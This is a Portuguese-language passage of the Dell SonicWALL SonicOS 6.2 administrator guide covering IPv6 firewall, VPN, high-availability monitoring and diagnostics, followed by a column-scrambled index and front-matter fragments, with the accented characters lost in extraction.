regras de acesso de IPv4, escolhendo objetos de endereos IPv6 em vez de objetos de
endereos IPv4. Na pgina Firewall > Regras de acesso, o boto de opo Visualizar verso
de IP possui trs opes: Somente IPv4, somente IPv6 ou IPv4 e IPv6.
Ao adicionar uma regra de acesso de IPv6, a origem e o destino s podem ser objetos de
endereos IPv6.
Configuraes avanadas do firewall de IPv6

possvel definir as configuraes avanadas de firewall para IPv6, incluindo as limitaes de
pacotes e as restries de trfego, na pgina Configuraes de firewall > Avanado.
Consulte Configuraes avanadas de IPv6 na pgina 675 para obter mais informaes.
| 1495
Configurao de VPN IPSec no IPv6
As VPN IPSec podem ser configuradas para IPv6 da mesma forma que as VPN de IPv4 aps
selecionar a opo IPv6 no boto de opo Visualizar verso de IP no canto superior
esquerdo da pgina VPN > Configuraes.
Determinados recursos de VPN no so atualmente suportados para IPv6, incluindo:

IKEv2 suportado, enquanto IKE no atualmente suportado
GroupVPN no suportado
DHCP sobre VPN no suportado.
Ao configurar uma poltica de VPN de IPv6, na guia Geral, os gateways devem ser
configurados usando endereos IPv6. FQDN no suportado. Ao configurar a autenticao
IKE, podem ser usados endereos IPV6 para as IDs IKE de mesmo nvel e locais.
Nota DHCP sobre VPN e o servidor L2TP no so suportados para IPv6.

Na guia Rede da poltica de VPN, devem ser selecionados os objetos de endereos IPV6 (ou
grupos de endereos que contm somente objetos de endereos IPv6) para a Rede local e a
Rede remota.
DHCP sobre VPN no suportado, logo as opes de DHCP para rede protegida no esto
disponveis.
A opo Qualquer endereo para Redes locais e a opo Tunelar tudo para Redes remotas
foram removidas. possvel optar por selecionar um objeto de endereo de rede IPv6 s com
zeros para a mesma funcionalidade e o mesmo comportamento.
Na guia Propostas, a configurao idntica para IPv6 e IPv4, exceto o fato de IPv6 s
suportar o modo IKEv2.
Na guia Avanado, somente Habilitar keep alive e as Configuraes de IKEv2 podem ser
configuradas para as polticas de VPN de IPv6.
Nota Uma vez que uma interface pode ter mltiplos endereos IPv6, por vezes, o endereo local
do tnel pode variar periodicamente. Se o usurio necessitar de um endereo IP
consistente, configure a poltica de VPN para que se vincule a uma interface e no a uma
zona e especifique o endereo manualmente. O endereo deve ser um dos endereos IPv6
dessa interface.
Configurao de SSL VPN para IPv6

O SonicOS suporta conexes NetExtender para usurios com endereos IPv6. Na pgina
SSLVPN > Configuraes de cliente, configure primeiro o pool de endereos IP IPv6
tradicionais e, em seguida, configure um pool de IPs IPv6. Sero atribudos aos clientes dois
endereos internos: um IPv4 e um IPv6.
Nota Os servidores WINS/DNS IPv6 no so suportados
Na pgina SSLVPN > Rotas de cliente, o usurio pode selecionar uma rota de cliente na lista
suspensa de todos os objetos de endereos, incluindo todos os objetos de endereos IPv6
predefinidos.
| 1497
Nota FQDN de IPv6 no suportado.
Visualizao de IPv6
A visualizao de IPv6 para o monitor de App Flow e o monitor em tempo real uma extenso
da visualizao de IPv4, permitindo o monitoramento em tempo real de taxas de interface/
aplicativo e a visibilidade de sesses na interface de gerenciamento.
Com as novas melhorias no monitoramento do painel de visualizao para IPv6, os
administradores podem responder de forma mais rpida a vulnerabilidades na segurana da
rede e a problemas de largura de banda da rede. Os administradores podem saber quais os
sites que seus funcionrios acessam, quais e em que medida os aplicativos e servios esto
sendo usados em suas redes para controlar o contedo transmitido para dentro e fora das
organizaes.
A pgina Monitor de App Flow tem duas novas opes para a seleo Visualizar verso de IP.
Estas permitem monitorar trfego somente de IPv6 ou de IPv4 e IPv6.
A pgina Monitoramento em tempo real tem essas duas novas opes no menu suspenso
Interface nos painis Aplicativos e Largura de banda.
Limitaes de recursos da visualizao de IPv6

A visualizao para IPv6 apresenta as seguintes limitaes em termos de recursos:
A classificao de URL de IPv6 no suportada, uma vez que o CFS no suporta todos
os aspectos de IPv6.

A informao de pas de IPv6 no suportada.
Os relatrios externos de IPv6 no so suportados.
Configurar a visualizao de IPv6

A visualizao do monitor de App Flow e do monitoramento em tempo real configurada da
mesma forma no IPv6 e no IPv4; selecione os botes de opo Visualizar verso de IP para
alterar a visualizao/configurao. Consulte Painel de visualizao na pgina 49 para obter
mais informaes sobre a configurao geral da Visualizao.
Monitoramento de alta disponibilidade de IPv6

O monitoramento de alta disponibilidade (HA) de IPv6 implementado como uma extenso do
monitoramento HA no IPv4. Depois de configurar o monitoramento HA para IPv6, os
dispositivos primrios e de backup podem ser gerenciados a partir do endereo de
monitoramento IPv6 e a investigao de IPv6 consegue detectar o status da rede de pares HA.
Os botes de opo IPv6 e IPv4 exibidos na pgina Alta disponibilidade > Monitoramento
permitem alternar entre as duas visualizaes para uma configurao fcil de ambas as
verses de IP.

Limitaes de recursos do monitoramento de alta disponibilidade de IPv6 na pgina 1499
Investigao de alta disponibilidade de IPv6 na pgina 1499
Configurar o monitoramento de alta disponibilidade de IPv6 na pgina 1500
Limitaes de recursos do monitoramento de alta disponibilidade de IPv6

As limitaes de recursos do monitoramento HA de IPv6 so as seguintes:
A propriedade do monitoramento de link/fsico no pode ser alterada na pgina de
configurao do monitoramento HA de IPv6. Defina a propriedade na pgina de
configurao do monitoramento HA de IPv4.
A propriedade de substituio do MAC virtual no pode ser alterada na pgina de
configurao do monitoramento HA de IPv6. Defina a propriedade na pgina de
configurao do monitoramento HA de IPv4.
A investigao HA no pode ser habilitada no IPv4 e no IPv6 ao mesmo tempo. Ou seja,
se a investigao de IPv4 estiver habilitada, a investigao de IPv6 deve estar desabilitada
e vice-versa.
Investigao de alta disponibilidade de IPv6

Um pacote ICMPv6 enviado periodicamente dos dispositivos primrios e de backup para
investigar o endereo IPv6 e a resposta do endereo IPv6 investigado monitorada. Se o
dispositivo ativo no conseguir detectar o endereo IPv6 investigado, mas o dispositivo inativo
conseguir, o dispositivo de backup tem um status de rede melhor e o failover comea.
| 1499
Na investigao HA de IPv6, so usados endereos IPv6, solicitaes de eco de ICMPv6 e
respostas de eco de ICMPv6. A lgica usada para determinar o status da rede dos dispositivos
primrios e de backup a mesma para IPv4 e IPv6.
Configurar o monitoramento de alta disponibilidade de IPv6

A pgina de configurao do monitoramento HA de IPv6 herdada do IPv4, logo os
procedimentos de configurao so praticamente idnticos. Basta selecionar o boto de opo
IPv6 e consultar IPv6 na pgina 1443 para obter detalhes de configurao.
Leve em conta o seguinte ao configurar o monitoramento HA de IPv6:
As caixas de seleo Monitoramento de link/fsico e MAC virtual esto esmaecidos
porque so propriedades de camada dois. Ou seja, as propriedades so usadas pelo IPv4
e IPv6, logo o usurio tem de configur-las na pgina de monitoramento do IPv4.
O endereo IPv6 primrio/de backup deve estar na mesma sub-rede da interface e no
pode ser igual ao IP global e ao IP local do link do dispositivo primrio/de backup.
Se o IP de monitoramento primrio/de backup estiver definido para (no ::), no podem ser
iguais.
Se a caixa de seleo Gerenciamento estiver habilitada, o IP de monitoramento primrio/
de backup no pode estar sem especificar (isto , ::).
Se a caixa de seleo de investigao estiver habilitada, o IP de investigao no pode
estar sem especificar.
Monitoramento e diagnstico de IPv6

O SonicOS fornece uma gama completa de ferramentas de diagnstico para IPv6, incluindo as
seguintes:
Captura de pacotes na pgina 1501
Ping de IPv6 na pgina 1503
Pesquisa de DNS e pesquisa reversa de nome de IPv6 na pgina 1504

Captura de pacotes
A captura de pacotes suporta completamente o IPv6.
Alm disso, possvel usar palavras-chave do IPv6 para filtrar a captura de pacotes.
| 1501
Ping de IPv6
A ferramenta de ping inclui uma nova opo Preferir rede IPv6.
Ao executar ping em um nome de domnio, usado o primeiro endereo IP que retornado e

mostrado o endereo de ping real. Se forem retornados um endereo IPv4 e um endereo
IPv6, por padro, o firewall executa ping no endereo IPv4.
Se a opo Preferir rede IPv6 estiver habilitada, o firewall executar ping no endereo IPv6.
| 1503
Pesquisa de DNS e pesquisa reversa de nome de IPv6
Ao executar uma pesquisa de DNS de IPv6 ou uma pesquisa reversa de nome de IPv6, voc
deve inserir o endereo do servidor DNS. Pode ser usado o endereo IPv6 ou IPv4.

ndice
A assistente de poltica de VPN
Acelerao de WAN 1275 adaptador de IP virtual 1433
adaptador de IP virtual autenticao 1432, 1439
assistente de poltica de VPN 1433 autenticao do usurio 1433
adicionando chave pr-compartilhada 1436
grupos 989 conectar clientes de VPN globais 1434
grupos locais 989 configuraes de segurana IKE 1432, 1438
adicionando grupos locais criptografia 1432, 1439
de usurios 989 durao 1439
adicionar 560 endereo IP do par 1436
usurios 984 grupo DH 1432, 1439
usurios locais 984 mtodo chave IKE fase 1 1430
administrao nome da poltica 1436
configuraes de gerenciamento da web 107 redes de destino 1438
gerenciamento GMS 115 redes locais 1437
gerenciamento SNMP 113 resumo de configurao 1439
nome do firewall 104 tipo de poltica de VPN 1430
nome e senha do administrador 104 VPN de grupo da WAN 1430
segurana de login 106 VPN site a site 1434
Agentes de assistente de servidor pblico 1428
SSO 963 endereo IP privado do servidor 1426
agregao de links 206 iniciando 1425
Ajuda 45 nome do servidor 1426
alta disponibilidade objeto de grupo de servios 1428
como funciona 1092 objetos de endereos do servidor 1428
como funciona a AD estvel 1093 polticas de NAT 1428
deteco de falhas 1090 regras de acesso 1429
endereo MAC virtual 1090 tipo de servidor 1425
terminologia 1089 Assistentes 45
anti-vrus de rede 1199 assistentes
ativao 1199 assistentes de configurao 1419
rea de trabalho remota 931 autenticao
ARP 343 assistente de poltica de VPN 1432
liberar cache 346 autenticao de usurios
navegar e classificar entradas 346 do SonicWALL 984
tabela do cache de ARP 346 autenticao do usurio
Arquitetura de Imposio Distribuda (DEA) 1229 assistente de poltica de VPN 1433
arquitetura do Auxiliar de IP 383
intrusion prevention service 1230 auxiliar de IP
assinaturas 1220 adicionar poltica de DHCP 386
atualizar manualmente 1162 adicionar poltica de NetBIOS 386
assistente
B
servidor pblico 1425
Bit DF 866
assistente de configurao
boto criar regra 582
alterar fuso horrio 1422
BSSID (Basic Service Set Identifier) 488
alterar senha 1421
BWM
configuraes de DHCP de LAN 1424
gerenciamento de largura de banda 677
configuraes de LAN 1423
endereo IP esttico com NAT habilitada 1420 C
modo de rede WAN 1422 canais 489
resumo de configurao 1424 certificados 117
assinatura requestVPN
solicitao de assinatura de
| 1505
certificado 122 controle de aplicativos
importando 119 ao de monitor de pacotes 581
SCEP aes de BWM, predefinidas 581, 602
chave assistente 624
assistente de poltica de VPN 1430 carregar a partir de arquivo 594, 606
IKE fase 1 1430 casos de uso 641
chave pr-compartilhada componentes 577
assistente de poltica de VPN 1436 configurao de poltica 609
clientes de VPN globais correspondncia negativa 599
assistente de poltica de VPN 1434 criar regra a partir do monitor App Flow 582
conectividade da Internet cronograma 613, 616, 618
assistente de configurao 1419 expresses comuns 594
configurao filtrar por aplicativo 600
assistente de configurao 1419 filtrar por categoria 601
de NTLM 1038 gerenciamento de largura de banda 578
do monitor de pacotes 144 habilitar 609
configurao de autenticao de NTLM habilitar em zonas de rede 610
no SSO 1038 licenciar 606
configuraes lista de excluso 611
VPN 829 objetos da lista de aplicativos 600, 630
configuraes avanadas objetos de ao 602, 631
do SSO 1055 objetos de correspondncia 589, 627
configuraes avanadas de filtro do monitor objetos de endereo de e-mail 605, 633
do monitor de pacotes 152 poltica por aplicativo 614
configuraes de poltica por assinatura 616
usurios 973 poltica por categoria 612
configuraes de filtro do monitor polticas 584
do monitor de pacotes 147 preveno contra vazamento de dados 575
configuraes de NTLM sobre 574
no navegador 965 cores do LED para o status do agente SSO
configuraes de NTLM no SSO 1030
no navegador 965 criando grupos locais
Configuraes de protocolo de WAN 206 de usurios 988
configuraes de protocolo de WAN 206 criando uma conta no
Configuraes de protocolo PPoE 206 mysonicwall.com 1214
configuraes de rede criptografia
assistente de configurao 1420 assistente de poltica de VPN 1432, 1439
configuraes de servios de segurana Criptografia do Suite B 124
segurana mxima 1160
configuraes de servios de seguranadesem- D
penho otimizado 1160 de largura de banda
configuraes do espelho tipo Avanado 678
do monitor de pacotes 154 DeepSee 1350
Configuraes do servidor CFS 1180 Delegao de prefixo DHCPv6 1473
configuraes globais descoberta do vizinho 347
dos usurios 977 Deteco de mesmo nvel de IKE inativo 866
Configuraes globais do Anti-Spyware 1254 DHCP
configurando a autenticao de usurio assistente de configurao 1424
do RADIUS 993 gateway central VPN 872
configurando a autenticao RADIUS gateway remoto VPN 872
de usurios 993 modo de retransmisso 871
consentimento 1187 DHCP sobre VPN
Contabilizao RADIUS 966 concesses 875

diagnsticos 163 expresses comuns 594
monitor central 170
monitor de conexes ativas 167 F
monitor de link 171 failover de hardware
monitor de servidor web 179, 180 WAN sem fio 422
monitor de tamanho de pacotes 172 failover de WAN
monitor multi-core 50, 61, 169 estatsticas 259
pesquisa de nome DNS 173 fase 1
ping 174 assistente de poltica de VPN 1430
relatrio do suporte tcnico 164 fase 2
resoluo de nome reversa 176 assistente de poltica de VPN 1438
rota de rastreamento 178 filtragem de protocolo 1220
verificar configuraes de rede 166 FIPS 137
dicas de ferramenta 42 firmware
Diffie-Hellman, consulte o grupo DH atualizao automtica 137
difuso seletiva 719 fuso horrio
criar um novo objeto de difuso seletiva 721 assistente de configurao 1422
rastreamento 720 G
recepo de todos os endereos de difuso GAV
seletiva 721 assinaturas 1220, 1225
solicitar relatrios de associao IGMP para banco de dados do antivrus na nuvem 1224
encaminhamento de dados de difuso configurando 12171227
seletiva 720 filtragem de protocolo 1220
tabela de estados IGMP 721 informaes de status 1219
tempo limite de entrada da tabela de estados inspeo de entrada 1221
de difuso seletiva 720 inspeo de sada 1221
dispositivo de segurana interfaces 1218
assistente de configurao 1419 mensagens SMTP 1223
DNS notificao HTTP sem cliente 1223
com servidor L2TP 878 transferncia de arquivos restrita 1222
configurar 273 zonas 1218
especificar servidores DNS manualmente 273, gerenciamento de firmware
274 atualizando o firmware 136
herdar configuraes dinamicamente 273, 274 exportar configuraes 134
preveno contra ataque de religao 274 imagem de firmware de backup 136
DNS dinmico 393 importar configuraes 134
configurar 394 notificao automtica 134
provedores 394 reinicializando o firmware 135
domnios confiveis 1177 gerenciamento de largura de banda
DoS 798 alterando o tipo 680
Downloads de arquivo HTTP BWM 677
GAV 1211 configurar 678
E configurar por aplicativo 688
edio configurar por regra de acesso do firewall 684
de usurios 986 criar regras usando o monitor de fluxo de
de usurios locais 986 aplicativo 691
editor hexadecimal 637 criar uma nova ao 686
Efetuar logout 45 definido 706
endereo IP invlido conhecido 797 global e WAN 578
endereos IP filtrados obrigatrios 1188 identificar aplicativos baseados em assinatura
estatsticas no TSR no monitor de fluxo de aplicativo 692
do SSO 1058 identificar aplicativos baseados em servio no
Ethereal 142
| 1507
monitor de fluxo de aplicativo 692 interface de gerenciamento 40
tipo Global 678 aplicar alteraes 42
tipo Nenhum 678 assistentes 45
usar com objetos de ao 680 configurao de modo 46
usar monitor de fluxo de aplicativo 689 efetuar logout 45
gerenciar servios de segurana online 99 cones comuns 41
grupo de endereos interface de usurio dinmica 40
assistente de poltica de VPN 1438 navegar 41
grupo de servios navegar em tabelas 44
assistente de servidor pblico 1428 obter ajuda 45
Grupo DH 1432 interfaces
grupo DH configurar interface de WAN 202
assistente de poltica de VPN 1439 configurar interfaces estticas de LAN 193
grupos configurar interfaces sem fio 200
de usurios 985 configurar o modo de cabo 214
usurios 985 gerenciamento de largura de banda 197
modo transparente 197
H intrusion prevention service
H.323 775 deep packet inspection 1230
transformando mensagens de H.323 786 IPV6
hora descoberta do vizinho 347
configurao 128 IPv6 1443
configuraes de NTP 128
J
I janela de status de login 1076
IDS 487 Janela Editar zona 1242, 1256
pontos de acesso invasor 487
sem fio 487 L
IDS sem fio (Servio de deteco de intruso) L2TP 877
pontos de acesso autorizados 490 Configurando 878
IKE L2TP sobre IPSec 877
assistente de poltica de VPN 1430, 1438 LAN
fase 2 1438 assistente de configurao 1423
grupo DH 1432 Layer 2 Tunneling Protocol, consulte L2TP
imposio do SSO LDAP
em zonas 1035 importando usurios do LDAP 986
imposio por zona licenas
do SSO 1035 dos servios de segurana 98
indicadores de status limite de conexo 564
do monitor de pacotes 155 Linux
inspeo de entrada 1221 com uso do Samba para SSO 957, 1060
Inspeo de pacote detalhada Lista de adiamentos 798
GAV 1212 Lista de contatos bloqueados 797
inspeo de pacote detalhada 1212 lista de excluso
inspeo GAV de sada 1221 configurando 1224
instalao do agente Lista de excluso CFS 1178
SSO 1017 Lista de reputao 798
interface lista personalizada 1185
fsica 187 Log
Automao 1347

log N
automao 49, 1283 NAT
configuraes do servidor de e-mail 1348 modo roteado alternativo 196
DeepSee 1350 NAT transversal 866
endereos de alerta de e-mail 1348 NDP 347
gerar relatrios 1355 Negao de servio 798
nveis de prioridade de mensagem de NetExtender, consulte SSL VPN
evento 1327 Nvel de acionador de falha 866
PCAP 1350 notificao HTTP sem cliente 1223
resoluo de nome 1353 notificao sem cliente 1223
tabela de visualizao 1320 NTLM
visualizar eventos 1317 como funciona o NTLM 965
logs sobre a autenticao de NTLM 961
prioridade, configurar 1330
O
M objeto de endereo
Macintosh assistente de poltica de VPN 1438
com uso do Samba para SSO 957, 1060 objetos
manipulao de pacote fragmentado 866 grupo de servios 1428
Marcadores RDP 931 objetos de endereos
Marcadores SSL VPN 927 adicionar 278
MCUs 775 assistente de servidor pblico 1428
mensagens SMTP, supresso 1223 criar grupos 280
mtodo de endereo MAC 276
autenticao de usurio 974, 975 host 275
modo de cabo 214 intervalo 275
Modo de ponte de camada 2 219 padro 278
modo de sniffer IPS rede 275
comparar com o modo de ponte L2 220 sobre 275
configurar 210 tipos 275
viso geral 190
modo de tap 214 P
modo de um brao, consulte o modo de sniffer IPS pacotes
modo roteado 196 do espelho 154
Modo transparente 190, 221, 223 PCAP 1350
monitor central 170 perfis de convidados 1076
monitor de fluxo de aplicativo Perfis de provisionamento
configurar gerenciamento de largura de do SonicPoint 456, 509
banda 689 personalizar
monitor de link 171 pginas de login 980
monitor de pacote personalizar pginas de login
exibindo pacotes 86 dos usurios 980
monitor de pacotes poltica de loopback 1428
com base em regras do firewall 146 poltica de uso aceitvel 979
Despejo hexa 88 aos usurios 979
detalhes do pacote 88 Polticas de NAT 323
filtro de exibio 148 polticas de NAT
iniciando captura 86 assistente de servidor pblico 1428
iniciando espelho 86 campo de comentrio 327
operao bsica 84 configuraes 326
monitor de tamanho de pacotes 172 converso de endereo de porta de
monitor multi-core 50, 61, 169 entrada 336, 337
monitoramento de rede 399 criar 331
criar uma poltica de NAT de muitos para
muitos 333
criar uma poltica de NAT de muitos para
| 1509
um 332 registrando o dispositivos de segurana
criar uma poltica de NAT de um para um de SonicWALL 1215
sada 333 registro em log
criar uma poltica de NAT um para um de do monitor de pacotes 150
entrada 334 registro em log do FTP
destino convertido 327 do monitor de pacotes 152
destino original 327 regras de acesso
habilitar 327 assistente de servidor pblico 1429
interface de entrada 327 exemplos 565
interface de sada 327 gerenciamento de largura de banda 557, 684
navegar e classificar 325 opes avanadas 565
origem convertida 327 visualizao 558
origem original 326 regras de acesso avanadas 671
poltica de loopback 1428 conexes de dados FTP para utilizar a porta
poltica reflexiva 327 20 673
servio convertido 327 descartar pacotes roteados de origem 673
servio original 327 modo furtivo 672
polticas de rota 304 tornar ID de IP aleatrio 672
pontos de acesso transformaes RTSP 673
SonicPoints 455 regras de aplicativo
pontos de acesso invasor 487 tipos de objeto de correspondncia 589
preveno contra vazamento de dados 575 regras de aplicativos
programaes caractersticas do tipo de poltica 586
adicionando 131 configurao da redundncia de log 619
excluindo 132 configurao de poltica 620
misto 132 criar regra a partir do monitor App Flow 582
recorrente 131 gerenciamento de largura de banda 578
uma vez 131 habilitar 619
propriedades de filtro 1179 polticas 584
proteo de downloads de arquivo HTTP 1211 reiniciar dispositivo de segurana da
proteo de locais remotos 1210 SonicWALL 181
proteo de rede interna 1211 remetentes de spam 796
proteo para servidores 1212 Remetentes de spam conhecidos 797
protocolo de criptografia sem fio, consulte WEP remetentes de spam conhecidos 796
Protocolo de descoberta SonicWALL, consulte Reputao do IP GRID 797
SDP restringir recursos da Web 1177
Protocolo de provisionamento simples SonicWALL, resumo da caixa de lixo eletrnico
consulte SSPP enviar apenas para usurios LDAP 815
Protocolo de registro de certificado simples frequncia padro 815
Consulte SCEP linha de assunto 815
proxy da Web 389 URL para exibio do usurio 815
configurar 390, 391 roteamento 301
ignorar servidores proxy 390 anncio de rota 302
configurao de anncio de rota 302
Q exemplo de poltica de rota 308
quadros jumbo 195, 205 rotas estticas 301, 306
R roteamento com base em poltica 304
RADIUS roteamento com base em poltica habilita-
com servidor L2TP 878 do por investigao 307
recuperao tabela de polticas de rota 305
das pginas de login 982 valores mtricos 304
rede sem fio roteamento com base em poltica 304
SonicPoint 455 roteamento com base em poltica habilitado por
redundncia de portas 206 investigao 307

S SonicPoints 455
Samba gerenciando 456
do SSO para Mac/Linux 957, 1060 IDS 487
SCEP relatrios 483
SDP 472, 785 status da estao 483
senha spyware de alto nvel de perigo 1254
assistente de configurao 1421 spyware de baixo nvel de perigo 1254
servio de filtragem de contedo 1167 spyware de nvel mdio de perigo 1254
ativando 1176 SSID (Service Set Identifier) 488
pgina da web bloqueada 1179 SSL 902
servios 293 SSL VPN
adicionar grupo de servios configurao de zonas 897
personalizados 298 configuraes do cliente 896
adicionar servios personalizados 296 configuraes do portal 894
protocolos suportados 294 configuraes do servidor 893
servios padro 294 marcadores
servios de segurana usurios
atualizao manual 100 marcadores de SSL VPN 927
atualizao manual para ambientes rotas de clientes 899
fechados 100 status 892
atualizar manualmente 1162 usando NetExtender 901
gerenciando online 1159 virtual office 901
resumo 1157 viso geral 888
servios para convidados 1075 SSO
janela de status de login 1076 como funciona o NTLM 965
perfis de convidados 1076 sobre a autenticao de NTLM 961
servidor SSPP 472
assistente de servidor pblico 1425 status
Servidor de Terminal 931 servios de segurana 95
Servidor DHCP 356 usurios 973
servidor DHCP status de convidados 1082
concesses atuais 361 Status do anti-spyware 1254
configuraes de VoIP 372 status do espelhamento
entradas estticas 370 do monitor de pacotes 156
intervalos dinmicos 366 Suporte
opes avanadas 361 do SSO ao Samba para Mac/Linux 957, 1060
servidor syslog 1341 Suporte Tcnico da SonicWALL 35
sesses ativas syslog
dos usurios 973, 1064 adicionar servidor 1345
sinais configuraes do servidor 1342
medio de intensidade 489
SIP 775 T
mdia 786 tabela de assinaturas 1225
porta UDP 786 tamanho do cache de URL 1181
sinalizando 786 terminologia do
transformando mensagens de SIP 785 intrusion prevention service 1231
sistema testar
alertas 95 URL para exibio do usurio no resumo da
informaes 94 caixa de lixo eletrnico 815
interfaces de rede 96 tipos de arquivo de exportao
sistema de deteco de intruses, consulte IDS do monitor de pacotes 159
tipos de pacotes suportados
do monitor de pacotes 159
transferncia de arquivos, restrito 1222
| 1511
U VPN de grupo 1430
usurios VPN site a site
configuraes 973 assistente de poltica de VPN 1434
contas de convidados 1077 nome da poltica 1436
janela de status de login 1076
W
perfil de convidados 1076
WAN
servios para convidados 1075
assistente de configurao 1422
status 973
VPN de grupo 1430
status de convidados 1082
WAN sem fio 419, 421, 441
usurios locais 983
failover 422
usurios locais 983
limite de dados 436
V modelo de conexo 422
vantagens monitoramento 438
do monitor de pacotes 142 placas de PC 426
Verificao de certificado de cliente 108 pr-requisitos 426
viso geral provedores de servios 426
do monitor de pacotes 141, 142 status 427
Viso geral do tempo de conexo mximo 433
GAV 12091213 viso geral 421426
VPN 829, 865 WEP 461, 467
bit DF 866 Wireshark 142
concesses de DHCP 875 wireshark 634
configuraes 829
Y
configuraes avanadas 866
YouTube for Schools 1190
DHCP sobre VPN 871
gateway central 872 Z
gateway remoto 872 zona
exportar poltica de cliente 844 sem fio 456
failover para uma rota esttica 858 SonicPoints 456
global VPN client 833 zonas 263
GroupVPN 838 adicionar 268
interface de tnel 859 como funcionam as zonas 264
roteamento avanado 317, 860 configurao para SSL VPN 897
janela de poltica de VPN 846 GAV 1218
L2TP sobre IPSec 877 habilitar servios de segurana 266
modo de retransmisso DHCP 871 permitir confiana de interface 266, 271
NAT transversal 866 predefinidas 265
servidor L2TP 877 tabela de configuraes de zona 267
sesses L2TP ativas 880 tipos de segurana 265
site a site 845 zonas sem fio 456
tneis ativos 835

Sonicos 6.2 Admin Guide (Brazil) PDF

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Sonicos 6.2 Admin Guide (Brazil) PDF

Încărcat de

Drepturi de autor:

Formate disponibile

Guia do Administrador do

CUIDADO: indica risco de dano ao hardware ou perda de dados se as instrues no forem

AVISO: indica risco de dano a propriedades, ferimentos ou morte.

2014 Dell Inc.

eDirectory e NetWare so marcas registradas da Novell, Inc.

2014 10 P/N 232-002597-00_Rev A

2 | Guia do Administrador do SonicOS 6.2

4 | Guia do Administrador do SonicOS 6.2

6 | Guia do Administrador do SonicOS 6.2

8 | Guia do Administrador do SonicOS 6.2

10 | Guia do Administrador do SonicOS 6.2

Parte 9. Configuraes de firewall

12 | Guia do Administrador do SonicOS 6.2

Parte 10. DPI-SSL

Parte 11. VoIP

Parte 12. Anti-spam

Parte 13. VPN

14 | Guia do Administrador do SonicOS 6.2

Parte 14. SSL VPN

Parte 15. Virtual Assist

Parte 16. Gerenciamento de usurio

Parte 17. Alta disponibilidade

16 | Guia do Administrador do SonicOS 6.2

Parte 18. Servios de segurana

18 | Guia do Administrador do SonicOS 6.2

Parte 19. Acelerao de WAN

Parte 20. AppFlow

Parte 21. Registrar

20 | Guia do Administrador do SonicOS 6.2

22 | Guia do Administrador do SonicOS 6.2

Aviso de direitos autorais

Organizao deste guia

26 | Guia do Administrador do SonicOS 6.2

28 | Guia do Administrador do SonicOS 6.2

Parte 7 Configuraes de firewall

30 | Guia do Administrador do SonicOS 6.2

Parte 12 SSL VPN

Parte 13 Virtual Assist

Parte 14 Gerenciamento de usurio

Parte 15 Alta disponibilidade

Parte 16 Servios de segurana

Parte 17 Acelerao de WAN

32 | Guia do Administrador do SonicOS 6.2

34 | Guia do Administrador do SonicOS 6.2

cones usados neste manual

CUIDADO: indica um possvel dano ao hardware ou a perda de dados se as instrues no

ADVERTNCIA: indica possveis danos ao equipamento, leses pessoais ou morte.

DICA: fornece informaes teis sobre os recursos de segurana e as configuraes no seu

Suporte tcnico da Dell SonicWALL

36 | Guia do Administrador do SonicOS 6.2

Registrando o dispositivo de segurana da Dell SonicWALL

Nota As informaes de registro de mysonicwall.com no so vendidas ou compartilhadas com

Tambm possvel registrar seu dispositivo de segurana no site https://www.mysonicwall.com

Criar uma conta MySonicWALL

38 | Guia do Administrador do SonicOS 6.2

Etapa 4 Clique em Enviar depois de preencher o formulrio Conta MySonicWALL.

Registrando o dispositivo de segurana da Dell SonicWALL

Interface de usurio dinmica

40 | Guia do Administrador do SonicOS 6.2

Se a barra de navegao continuar abaixo da parte inferior do seu navegador, exibido um

cones comuns na interface de gerenciamento

Se as configuraes estiverem includas em uma janela secundria na interface de

Nota Nem todos os elementos de interface do usurio tm dicas de ferramenta. Se no for